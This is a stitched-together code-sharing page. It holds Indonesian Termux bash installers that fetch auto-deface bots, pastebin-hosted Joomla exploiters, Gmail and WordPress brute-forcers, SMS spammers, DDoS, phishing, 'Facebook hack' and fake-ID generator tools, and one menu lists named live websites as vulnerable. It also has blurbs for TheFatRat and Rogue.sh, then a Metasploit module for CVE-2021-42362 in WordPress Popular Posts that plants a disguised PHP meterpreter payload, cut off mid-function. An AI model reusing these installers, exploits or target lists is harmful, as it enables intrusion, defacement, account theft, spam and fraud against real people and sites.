apt-get install git apt-get install wget apt-get install perl apt-get install unzip git clone https://github.com/mrcakil/bot.git cd bot unzip bot.zip cd xploit chmod 777 bot.pl echo -e $red" Lokasi bot ? /bot/xploit/bot.pl" echo -e $red" done install cuk " fi if [ $act = 39 ] || [ $act = 39 ] then clear echo -e $green" installing bot auto deface 2 " sleep 1 apt-get update && apt-get upgrade apt-get install git && apt-get install perl git clone https://github.com/Moham3dRiahi/XAttacker cd XAttacker chmod 777 XAttacker.pl echo -e $red" done install cuk " fi if [ $act = 40 ] || [ $act = 40 ] then clear echo -e $green" installing mailer-sender " sleep 1 apt-get update && apt-get upgrade apt-get install php5-cli curl -sS https://getcomposer.org/installer | php chmod +x composer.phar sudo mv composer.phar /usr/bin/composer git clone https://github.com/pedro-stanaka/mailer-cli.git echo -e $red" note !! " echo -e $red" usage php sendmail.php notification:mailer <email> <subject> <body>; " echo -e $red" or " echo -e $red" php sendmail.php --help " echo -e $red" done install cuk " fi if [ $act = 41 ] || [ $act = 41 ] then clear echo -e $green" installing wordpress brute force " sleep 1 apt-get update && apt-get upgrade apt-get install python2 pip install request git clone https://github.com/atarantini/wpbf echo -e $red" done install cuk " fi if [ $act = 42 ] || [ $act = 42 ] then clear echo -e $green" installing termux Ohmyzsh " sleep 1 apt-get update && apt-get upgrade sh -c "$(curl -fsSL https://github.com/Cabbagec/termux-ohmyzsh/raw/master/install.sh)" ~/.termux/colors.sh echo -e $red" ganti color ? ketik ~/.termux/colors.sh " echo -e $red" Done Install Cuk " fi if [ $act = 43 ] || [ $act = 43 ] then clear echo -e $green" installing Instabot instagram bot " sleep 1 apt-get update && apt-get upgrade pkg install python2 apt-get install git apt-get install nano git clone https://github.com/instabot-py/instabot.py echo -e $red" Done Install Cuk " echo -e $red" Please wait... " echo -e $red" Please wait... " sleep 1 cd instabot.py echo -e $red" ketik nano example.py " echo -e $red" masukan username dan password mu" echo -e $red" Done cuk " fi if [ $act = 44 ] || [ $act = 44 ] then clear echo -e $green" installing fsociety " sleep 1 apt-get update && apt-get upgrade pkg install python apt-get install git git clone https://github.com/Manisso/fsociety echo -e $red" Done Install Cuk " echo -e $red" Please wait... " echo -e $red" Please wait... " sleep 1 cd fsociety echo -e $red" python fsociety.py " fi if [ $act = 45 ] || [ $act = 45 ] then clear echo -e $green" installing CMS Scanner " sleep 1 apt-get update && apt-get upgrade pkg install python apt-get install git git clone https://github.com/Dionach/CMSmap.git sleep 1 cd CMSmap echo -e $red" Usage: cmsmap.py -t <URL> " fi if [ $act = 46 ] || [ $act = 46 ] then clear echo -e $green" installing INFORMATION Gathering " sleep 1 apt-get update && apt-get upgrade pkg install python apt-get install git git clone https://github.com/m4ll0k/Infoga.git infoga sleep 1 cd infoga pip install -r req echo -e $red" Usage: python infoga.py " fi if [ $act = 47 ] || [ $act = 47 ] then clear echo -e $green" installing com fabrik exploiter " sleep 1 apt-get update && apt-get upgrade apt-get install wget apt-get install php wget https://pastebin.com/raw/LDvFvtUD -O com_fabrik.php sleep 1 echo -e $red" Usage: php com_fabrik.php target.txt " fi if [ $act = 48 ] || [ $act = 48 ] then clear echo -e $green" installing com foxcontact exploiter " sleep 1 apt-get update && apt-get upgrade apt-get install wget apt-get install php wget https://pastebin.com/raw/EAtSir5V -O com_foxcontact.php sleep 1 echo -e $red" Usage: php com_foxcontact.php target.txt " fi if [ $act = 49 ] || [ $act = 49 ] then clear echo -e $green" installing gmail brute force " sleep 1 apt-get update && apt-get upgrade apt-get install git git clone https://github.com/JamesAndresCM/Brute_force_gmail sleep 1 echo -e $red" Usage: python2.7 brute_force_gmail.py example@gmail.com PATH_TO_DICTIONARY " fi if [ $act = 50 ] || [ $act = 50 ] then clear echo -e $green" installing ezsploit " sleep 1 apt-get update && apt-get upgrade apt-get install git git clone https://github.com/rand0m1ze/ezsploit sleep 1 echo -e $red" Done Install cuk " fi if [ $act = 51 ] || [ $act = 51 ] then clear echo -e $green" installing spammer grab " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install python2 pip install requests git clone https://github.com/p4kl0nc4t/Spammer-Grab/ sleep 1 echo -e $red" Done Install cuk " fi if [ $act = 52 ] || [ $act = 52 ] then clear echo -e $green" installing spammer toko pedia " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install unzip apt-get install php git clone https://github.com/mrcakil/spam cd spam unzip toko-pedia.zip sleep 1 echo -e $red" Done Install cuk " fi if [ $act = 53 ] || [ $act = 53 ] then clear echo -e $green" installing TheFatRat " sleep 1 apt-get update && apt-get upgrade apt-get install git git clone https://github.com/Screetsec/TheFatRat.git cd TheFatRat chmod +x setup.sh && ./setup.sh sleep 1 echo -e $red" Done Install cuk " fi if [ $act = 54 ] || [ $act = 54 ] then clear echo -e $green" installing IPGeolocation " sleep 1 apt-get update && apt-get upgrade apt-get install git apt install python2 git clone https://github.com/maldevel/IPGeolocation.git cd IPGeolocation chmod +x ipgeolocation.py pip install -r requirements.txt sleep 1 echo -e $red" Done Install cuk " fi if [ $act = 55 ] || [ $act = 55 ] then echo -e $green" pesan terakhir " sleep 1 echo -e $green" Master Hacker " sleep 1 echo -e $green"Jangan Nganggur Cuk " sleep 1 echo -e $green" Please Wait.... " sleep 1 echo -e $green" contact : mrcakil@programmer.net " sleep 1 echo -e $red" fb : https://www.facebook.com/ngintipwkwkwk " sleep 1 echo -e $red" Bye :* " sleep 1 exit fi
VolatileMindsLLC
C# bindings for the Metasploit RPC
anthophilee
Information This tool is for educational purpose only, usage of TheFatRat for attacking targets without prior mutual consent is illegal. Developers assume no liability and are not responsible for any misuse or damage cause by this program. Features ! Fully Automating MSFvenom & Metasploit. Local or remote listener Generation. Easily Make Backdoor by category Operating System. Generate payloads in Various formats. Bypass anti-virus backdoors. File pumper that you can use for increasing the size of your files. The ability to detect external IP & Interface address . Automatically creates AutoRun files for USB / CDROM exploitation But it's shit! And your implementation sucks! Yes, you're probably correct. Feel free to "Not use it" and there is a pull button to "Make it better". Installation Instructions on how to install TheFatRat git clone https://github.com/Screetsec/TheFatRat.git cd TheFatRat chmod +x setup.sh && ./setup.sh Update cd TheFatRat ./update && chmod +x setup.sh && ./setup.sh Troubleshoot on TheFatRat chk_tools script to use in case of problems in setup.sh of fatrat this script will check if everything is in the right version to run fatrat and will also provide you a solution for the problem cd TheFatRat chmod +x chk_tools ./chk_tools
1337spectra
Rogue.sh is an automated Bash script for Linux systems that performs Nmap scans, sets up Metasploit, exploits vulnerabilities, downloads sensitive files, gathers credentials, and executes post-exploitation tasks, providing a comprehensive overview of a target system's vulnerabilities and security measures.
Dzxmzstrt
#! cd /data/data/com.termux/files/usr/bin/bash clear cd data clear echo "Ngapain Ke Sini? siap Siap Ngebucin Ya!" | lolcat echo "Jawab:" ;read {$} clear figlet Mr.BalBaL.X | lolcat echo "================| Tools Bucin Gan:v | ===============" | lolcat echo"" echo"" figlet InstallerV5 echo " _______________________ " | lolcat echo "_________| Tools Installer V.5 |___________" | lolcat echo "|________|_____________________|__________|" | lolcat echo "|__| Thanks To 28 Black Hat Cyber Team |__|" | lolcat echo "|__|===================================|__|" | lolcat echo "|__| •Bucin Area😂• |__|" | lolcat echo "|__|===================================|__|" | lolcat echo "|_________| Author: Mr.B41B4L.X |_________|" | lolcat echo " |_____________________| " | lolcat echo "" echo "" echo "===========================================" | lolcat echo " Daftar Tools Yang Tersedia Synk " | lolcat echo "===========================================" | lolcat ################################################### # CTRL + C ################################################### trap ctrl_c INT ctrl_c() { clear echo $" kok keluar?,Kmu Mau Kmn Cintaku..Kok Buru Buru Banget Sih😢" | lolcat echo "" echo $" Byee,see you Yank❤..." | lolcat sleep 1 exit } lagi=1 while [ $lagi -lt 6 ]; do echo "" echo "" echo $"1. Nmap"; echo "=============================" | lolcat echo $"2. Admin-finder"; echo "=============================" | lolcat echo $"3. RED_HAWK"; echo "=============================" | lolcat echo $"4 Lazymux"; echo "=============================" | lolcat echo $"5. Tools-X"; echo "=============================" | lolcat echo $"6. LITESPAM Buat Spam Hati Dia"; echo "=============================" | lolcat echo $"7. LITEDDOS Buat Melumpuhkan Hati Dia"; echo "=============================" | lolcat echo $"8. HACK Facebook"; echo "=============================" | lolcat echo $"9. ToolsBAJINGANv6"; echo "=============================" | lolcat echo $"10. ToolsTU4N B4DUT"; echo "============================" | lolcat echo $"11. spamSms"; echo "============================" | lolcat echo $"12. Tools Striker"; echo "============================" | lolcat echo $"13. generate KTP/KK Untuk Menikahi Dia"; echo "=============================" | lolcat echo $"14. Tools Mr.Cakil"; echo "=============================" | lolcat echo $"15. Tools santetOnline"; echo "=============================" | lolcat echo $"16. Script Deface Creator"; echo "=============================" | lolcat echo $"17. Install Tools Crew-Bot"; echo "=============================" | lolcat echo $"18. Install Katoolin"; echo "=============================" | lolcat echo $"19. Tools Mr.Rv1.1"; echo "=============================" | lolcat echo $"20. Bermain Game Di Termux"; echo "=============================" | lolcat echo $"21. Nuyul Kubik"; echo "=============================" | lolcat echo $"22. Perkiraan Cuaca Kota Bekasi"; echo "=============================" | lolcat echo $"23. Animasi Keteta"; echo "=============================" | lolcat echo $"24. Menampilkan Informasi android"; echo "=============================" | lolcat echo $"25. Web Phising Creator"; echo "=============================" | lolcat echo $"26. Tools Hek Bank :v"; echo "=============================" | lolcat echo $"27. Spam SMS Jdid"; echo "=============================" | lolcat echo $"28. Kubik Bot"; echo "=============================" | lolcat echo $"29. Kumpulan Web VULN"; echo "=============================" | lolcat echo $"30. Bot Komentar FB"; echo "=============================" | lolcat echo $"31. Kumpulan Status Bucin:v"; echo "=============================" | lolcat echo $"32. Weeman"; echo "=============================" | lolcat echo $"33. metasploit"; echo "=============================" | lolcat echo $"34. OSIF BOT"; echo "=============================" | lolcat echo $"35. Scanner-INURLBR"; echo "=============================" | lolcat echo $"00. Exit"; echo "" echo -e "╭─Pilih Dong Sayank>" |lolcat read -p "╰─#" pil; # Nmap case $pil in 1) pkg install nmap echo -e "${y} {1} Masukkan Web${endc}:" read web nmap $web echo$ ;; # admin-finder 2) git clone https://github.com/the-c0d3r/admin-finder.git echo -e "${y} cara menggunakan admin finder" echo -e "${y} cd admin-finder" echo -e "${y} python admin-finder.py" cd /data/data/com.termux/files/home/admin-finder/ python2 /data/data/com.termux/files/home/admin-finder/admin-finder.py echo ;; #RED_HAWK 3) git clone https://github.com/Tuhinshubhra/RED_HAWK echo -e "${y} Installer RED_HAWK..." echo -e "${y} cd RED_HAWK" echo -e "${y} php RED_HAWK.php" cd /data/data/com.termux/files/home/RED_HAWK/ php /data/data/com.termux/files/home/RED_HAWK/ RED_HAWK.php ;; #Lazymux 4) git clone https://github.com/Gameye98/Lazymux echo -e "${y} Installer Lazymux..." echo -e "${y} cd Lazymux" echo -e "${y} python lazymux.py" cd /data/data/com.termux/files/home/Lazymux/ python2 /data/data/com.termux/files/home/Lazymux/ lazymux.py ;; #Tools-X 5) git clone https://github.com/Rajkumrdusad/Tool-X echo -e "${y} Installer Tool-X..." echo -e "${y} cd Tool-X" echo -e "${y} sh install.aex" cd /data/data/com.termux/files/home/Tool-X bash /data/data/com.termux/files/home/Tool-X/sh install.aex ;; #LITESPAM 6) git clone https://github.com/4L13199/LITESPAM cd LITESPAM sh LITESPAM.sh cd /data/data/com.termux/files/home/LITESPAM bash /data/data/com.termux/files/home/LITESPAM/LITESPAM.sh ;; #LITEDDOS 7) git clone https://github.com/4L13199/LITEDDOS cd LITEDDOS python2 LITEDDOS.py cd /data/data/com.termux/files/home/LITEDDOS python2 /data/data/com.termux/files/home/LITEDDOS/ LITEDDOS.py ;; #HACKFB 8)git clone https://github.com/hnov7/mbf cd mbf pip2 install mechanize python2 mbf.py cd /data/data/com.termux/files/home/mbf python2 /data/data/com.termux/files/home/mbf/mbf.py ;; #ToolsBAJINGANv6 9) git clone https://github.com/DarknessCyberTeam/BAJINGANv6 cd BAJINGANv6 sh BAJINGAN.sh cd /data/data/com.termux/files/home/BAJINGANv6 bash /data/data/com.termux/files/home/BAJINGANv6/BAJINGAN.sh ;; #Tools TU4N B4DUT 10) git clone https://github.com/TUANB4DUT/TOOLSINSTALLERv3 cd TOOLSINSTALLERv3 chmod +x TUANB4DUT.sh sh TUANB4DUT.sh cd /data/data/com.termux/files/home/TUANB4DUT bash /data/data/com.termux/files/home/TUANB4DUT/TUANB4DUT.sh ;; #SpamSMS 11) git clone https://github.com/joss24242/SpamSms cd SpamSms python2 mantan.py cd /data/data/com.termux/files/home/SpamSms python2 /data/data/com.termux/files/home/SpamSms/mantan.py ;; #Tools Striker 12) git clone https://github.com/UltimateHackers/Striker cd Striker pip2 install -r requirements.txt python2 striker.py cd /data/data/com.termux/files/home/Striker python2 /data/data/com.termux/files/home/Striker/striker.py ;; #GENERATE KTP/KK 13) git clone https://github.com/zerosvn/ktpkkgenerate cd ktpkkgenerate php zerosvn.php cd /data/data/com.termux/files/home/ktpkkgenerate php /data/data/com.termux/files/home/ktpkkgenerate/zerosvn.php ;; #Tools Mr.Cakil 14) git clone https://github.com/mrcakil/Mrcakil.git cd Mrcakil chmod +x tools ./tools cd /data/data/com.termux/files/home/Mrcakil bash /data/data/com.termux/files/home/Mrcakil/tools.sh ;; #Tools Santet Online 15) git clone https://github.com/Gameye98/santet-online cd santet-online python2 santet.py cd /data/data/com.termux/files/home/santet-online python2 /data/data/com.termux/files/home/santet-online/santet.py ;; #ScDefaceCreator 16) git clone https://github.com/Ubaii/script-deface-creator cd script-deface-creator chmod +x create.py python2 create.py cd /data/data/com.termux/files/home/script-deface-creator python2 /data/data/com.termux/files/home/script-deface-creator/create.py ;; #ToolsCrewBot 17) git clone https://github.com/Xeit666h05t/CrewBot cd CrewBot python2 CrewBot.pyc cd /data/data/com.termux/files/home/Crew-Bot python2 /data/data/com.termux/files/home/Crew-Bot/ Crew-Bot.pyc ;; #Katoolin 18) pkg install gnupg git clone https://github.com/LionSec/katoolin.git cd katoolin python2 katoolin.py nano katoolin.py cd /data/data/com.termux/files/home/Crew-Bot python2 /data/data/com.termux/files/home/script-deface-creator/ Crew-Bot.pyc ;; #tool Mr.Rv1.1 19) pkg install gem pkg install figlet gem install lolcat git clone https://github.com/Mr-R225/Mr.Rv1.1 cd Mr.Rv1.1, sh Mr.Rv1.1.sh cd /data/data/com.termux/files/home/Mr.Rv1.1 bash /data/data/com.termux/files/home/Mr.Rv1.1/ Mr.Rv1.1.sh ;; #BermainGame 20) pkg install moon-buggy moon-buggy ;; #Nuyul Kubik 21) pkg install php pkg install nano git clone https://github.com/adidoank/kubik cd kubik nano cfg.php cd /data/data/com.termux/files/home/kubik php /data/data/com.termux/files/home/kubik/ cfg.php ;; #Perkiraan Cuaca Kota Bekasi Dan Sekitarnya 22) pkg install curl curl http://wttr.in/bekasi exit ;; #Menampilkan Animasi Kereta 23) pkg install sl sl ;; #menampilkan ikon informasi android 24) pkg install neofetch neofetch ;; #Web Phising 25) apt install apache2 apt install php apt install git git clone https://github.com/Senitopeng/PhisingGame.git cd PhisingGame python2 phising.py cd /data/data/com.termux/files/home/PhisingGame python2 /data/data/com.termux/files/home/PhisingGame/ phising.php ;; #Hek Bank :v 26) apt install python2-dev apt install wget pip2 install mechanize git clone https://github.com/NurmalaCruzz/Hackbank.git cd Hackbank chmod +x nur.sh sh nur.sh cd /data/data/com.termux/files/home/Hackbank bash /data/data/com.termux/files/home/kubik/ nur.sh ;; #SpamJdid 27) pkg install php pkg install curl curl https://pastebin.com/raw/9BYy1JVc -o jdid.php ls php jdid.php cd /data/data/com.termux/files/home/jdid php /data/data/com.termux/files/home/jdid/ jdid.php ;; #Kubik Bot 28) git clone https://github.com/radenvodka/kubik-bot cd kubik-bot pkg install nano nano kubik.php cd /data/data/com.termux/files/home/kubik-bot php /data/data/com.termux/files/home/kubik-bot/ kubik.php ;; #Web VULN 29) clear echo " Kumpulan Web VULN Webdav " | lolcat echo "http://www.zambianacmisonline.org http://ticketexchange.co.il https://res.torontocentre.org http://m.nysdrillteams.com https://nnpessoa.com.br/site https://www.larimerhumane.org" ;; #Bot Komen FB 30) clear pip2 install mechanize git clone https://github.com/Senitopeng/Botkomena.git cd Botkomena python2 botkomena.py ;; 31) clear figlet "Alay Lu" | lolcat ;; #Weeman 32) clear apt-get update apt-get upgrade pkg install python2 pkg install git git clone https://github.com/evait-security/weeman.git ls cd weeman python2 weeman.py ;; #metasploit 33) clear pkg update && pkg upgrade pkg install curl pkg install python pkg install python2 curl -LO https://raw.githubusercontent.com/Techzindia/Metasploit_For_Termux/master/metasploitTechzindia.sh chmod 777 metasploitTechzindia.sh ./metasploitTechzindia.sh cd metasploit-framework ./msfconsole ;; #BOT OSIF 34) clear pip2 install requests mechanize apt install git git clone $https://github.com/CiKu370/OSIF.git cd OSIF pip2 install -r requirements.txt python2 osif.py ;; #Scanner-INURLBR 35) clear pkg install PHP git clone https://github.com/googleinurl/SCANNER-INURLBR.git cd SCANNER-INURLBR php inurlbr.php ;; 00) clear echo "Kok Keluar? Mau Kemana Cintaku..Kan Kita Baru Ketemu😢" | lolcat echo " Byee Synk❤" | lolcat exit ;; *) echo " CARI YANG ADA AJA KIMAK!! " | lolcat esac done done
Nate0634034090
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super( update_info( info, 'Name' => 'Wordpress Popular Posts Authenticated RCE', 'Description' => %q{ This exploit requires Metasploit to have a FQDN and the ability to run a payload web server on port 80, 443, or 8080. The FQDN must also not resolve to a reserved address (192/172/127/10). The server must also respond to a HEAD request for the payload, prior to getting a GET request. This exploit leverages an authenticated improper input validation in Wordpress plugin Popular Posts <= 5.3.2. The exploit chain is rather complicated. Authentication is required and 'gd' for PHP is required on the server. Then the Popular Post plugin is reconfigured to allow for an arbitrary URL for the post image in the widget. A post is made, then requests are sent to the post to make it more popular than the previous #1 by 5. Once the post hits the top 5, and after a 60sec (we wait 90) server cache refresh, the homepage widget is loaded which triggers the plugin to download the payload from our server. Our payload has a 'GIF' header, and a double extension ('.gif.php') allowing for arbitrary PHP code to be executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Simone Cristofaro', # edb 'Jerome Bruandet' # original analysis ], 'References' => [ [ 'EDB', '50129' ], [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/' ], [ 'WPVDB', 'bd4f157c-a3d7-4535-a587-0102ba4e3009' ], [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2542638' ], [ 'URL', 'https://github.com/cabrerahector/wordpress-popular-posts/commit/d9b274cf6812eb446e4103cb18f69897ec6fe601' ], [ 'CVE', '2021-42362' ] ], 'Platform' => ['php'], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => '2021-06-11', 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp', 'WfsDelay' => 3000 # 50 minutes, other visitors to the site may trigger }, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('USERNAME', [true, 'Username of the account', 'admin']), OptString.new('PASSWORD', [true, 'Password of the account', 'admin']), OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560 OptString.new('SRVHOSTNAME', [true, 'FQDN of the metasploit server. Must not resolve to a reserved address (192/10/127/172)', '']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584 OptEnum.new('SRVPORT', [true, 'The local port to listen on.', 'login', ['80', '443', '8080']]), ] end def check return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online? checkcode = check_plugin_version_from_readme('wordpress-popular-posts', '5.3.3') if checkcode == CheckCode::Safe print_error('Popular Posts not a vulnerable version') end return checkcode end def trigger_payload(on_disk_payload_name) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) # loop this 5 times just incase there is a time delay in writing the file by the server (1..5).each do |i| print_status("Triggering shell at: #{normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name)} in 10 seconds. Attempt #{i} of 5") Rex.sleep(10) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name), 'keep_cookies' => 'true' ) end if res && res.code == 404 print_error('Failed to find payload, may not have uploaded correctly.') end end def on_request_uri(cli, request, payload_name, post_id) if request.method == 'HEAD' print_good('Responding to initial HEAD request (passed check 1)') # according to https://stackoverflow.com/questions/3854842/content-length-header-with-head-requests we should have a valid Content-Length # however that seems to be calculated dynamically, as it is overwritten to 0 on this response. leaving here as notes. # also didn't want to send the true payload in the body to make the size correct as that gives a higher chance of us getting caught return send_response(cli, '', { 'Content-Type' => 'image/gif', 'Content-Length' => "GIF#{payload.encoded}".length.to_s }) end if request.method == 'GET' on_disk_payload_name = "#{post_id}_#{payload_name}" register_file_for_cleanup(on_disk_payload_name) print_good('Responding to GET request (passed check 2)') send_response(cli, "GIF#{payload.encoded}", 'Content-Type' => 'image/gif') close_client(cli) # for some odd reason we need to close the connection manually for PHP/WP to finish its functions Rex.sleep(2) # wait for WP to finish all the checks it needs trigger_payload(on_disk_payload_name) end print_status("Received unexpected #{request.method} request") end def check_gd_installed(cookie) vprint_status('Checking if gd is installed') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res.body.include? ' gd' end def get_wpp_admin_token(cookie) vprint_status('Retrieving wpp_admin token') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'tools' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /<input type="hidden" id="wpp-admin-token" name="wpp-admin-token" value="([^"]*)/ =~ res.body Regexp.last_match(1) end def change_settings(cookie, token) vprint_status('Updating popular posts settings for images') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'upload_thumb_src' => '', 'thumb_source' => 'custom_field', 'thumb_lazy_load' => 0, 'thumb_field' => 'wpp_thumbnail', 'thumb_field_resize' => 1, 'section' => 'thumb', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Unable to save/change settings') unless /<strong>Settings saved/ =~ res.body end def clear_cache(cookie, token) vprint_status('Clearing image cache') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'action' => 'wpp_clear_thumbnail', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 end def enable_custom_fields(cookie, custom_nonce, post) # this should enable the ajax_nonce, it will 302 us back to the referer page as well so we can get it. res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post.php'), 'cookie' => cookie, 'keep_cookies' => 'true', 'method' => 'POST', 'vars_post' => { 'toggle-custom-fields-nonce' => custom_nonce, '_wp_http_referer' => "#{normalize_uri(target_uri.path, 'wp-admin', 'post.php')}?post=#{post}&action=edit", 'action' => 'toggle-custom-fields' } ) /name="_ajax_nonce-add-meta" value="([^"]*)/ =~ res.body Regexp.last_match(1) end def create_post(cookie) vprint_status('Creating new post') # get post ID and nonces res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post-new.php'), 'cookie' => cookie, 'keep_cookies' => 'true' ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /name="_ajax_nonce-add-meta" value="(?<ajax_nonce>[^"]*)/ =~ res.body /wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware\( "(?<wp_nonce>[^"]*)/ =~ res.body /},"post":{"id":(?<post_id>\d*)/ =~ res.body if ajax_nonce.nil? print_error('missing ajax nonce field, attempting to re-enable. if this fails, you may need to change the interface to enable this. See https://www.hostpapa.com/knowledgebase/add-custom-meta-boxes-wordpress-posts/. Or check (while writing a post) Options > Preferences > Panels > Additional > Custom Fields.') /name="toggle-custom-fields-nonce" value="(?<custom_nonce>[^"]*)/ =~ res.body ajax_nonce = enable_custom_fields(cookie, custom_nonce, post_id) end unless ajax_nonce.nil? vprint_status("ajax nonce: #{ajax_nonce}") end unless wp_nonce.nil? vprint_status("wp nonce: #{wp_nonce}") end unless post_id.nil? vprint_status("Created Post: #{post_id}") end fail_with(Failure::UnexpectedReply, 'Unable to retrieve nonces and/or new post id') unless ajax_nonce && wp_nonce && post_id # publish new post vprint_status("Writing content to Post: #{post_id}") # this is very different from the EDB POC, I kept getting 200 to the home page with their example, so this is based off what the UI submits res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'ctype' => 'application/json', 'accept' => 'application/json', 'vars_get' => { '_locale' => 'user', 'rest_route' => normalize_uri(target_uri.path, 'wp', 'v2', 'posts', post_id) }, 'data' => { 'id' => post_id, 'title' => Rex::Text.rand_text_alphanumeric(20..30), 'content' => "<!-- wp:paragraph -->\n<p>#{Rex::Text.rand_text_alphanumeric(100..200)}</p>\n<!-- /wp:paragraph -->", 'status' => 'publish' }.to_json, 'headers' => { 'X-WP-Nonce' => wp_nonce, 'X-HTTP-Method-Override' => 'PUT' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Post failed to publish') unless res.body.include? '"status":"publish"' return post_id, ajax_nonce, wp_nonce end def add_meta(cookie, post_id, ajax_nonce, payload_name) payload_url = "http://#{datastore['SRVHOSTNAME']}:#{datastore['SRVPORT']}/#{payload_name}" vprint_status("Adding malicious metadata for redirect to #{payload_url}") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_post' => { '_ajax_nonce' => 0, 'action' => 'add-meta', 'metakeyselect' => 'wpp_thumbnail', 'metakeyinput' => '', 'metavalue' => payload_url, '_ajax_nonce-add-meta' => ajax_nonce, 'post_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Failed to update metadata') unless res.body.include? "<tr id='meta-" end def boost_post(cookie, post_id, wp_nonce, post_count) # redirect as needed res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => 'true', 'cookie' => cookie, 'vars_get' => { 'page_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 || res.code == 301 print_status("Sending #{post_count} views to #{res.headers['Location']}") location = res.headers['Location'].split('/')[3...-1].join('/') # http://example.com/<take this value>/<and anything after> (1..post_count).each do |_c| res = send_request_cgi!( 'uri' => "/#{location}", 'cookie' => cookie, 'keep_cookies' => 'true' ) # just send away, who cares about the response fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res = send_request_cgi( # this URL varies from the POC on EDB, and is modeled after what the browser does 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_get' => { 'rest_route' => normalize_uri('wordpress-popular-posts', 'v1', 'popular-posts') }, 'keep_cookies' => 'true', 'method' => 'POST', 'cookie' => cookie, 'vars_post' => { '_wpnonce' => wp_nonce, 'wpp_id' => post_id, 'sampling' => 0, 'sampling_rate' => 100 } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 201 end fail_with(Failure::Unreachable, 'Site not responding') unless res end def get_top_posts print_status('Determining post with most views') res = get_widget />(?<views>\d+) views</ =~ res.body views = views.to_i print_status("Top Views: #{views}") views += 5 # make us the top post unless datastore['VISTS'].nil? print_status("Overriding post count due to VISITS being set, from #{views} to #{datastore['VISITS']}") views = datastore['VISITS'] end views end def get_widget # load home page to grab the widget ID. At times we seem to hit the widget when it's refreshing and it doesn't respond # which then would kill the exploit, so in this case we just keep trying. (1..10).each do |_| @res = send_request_cgi( 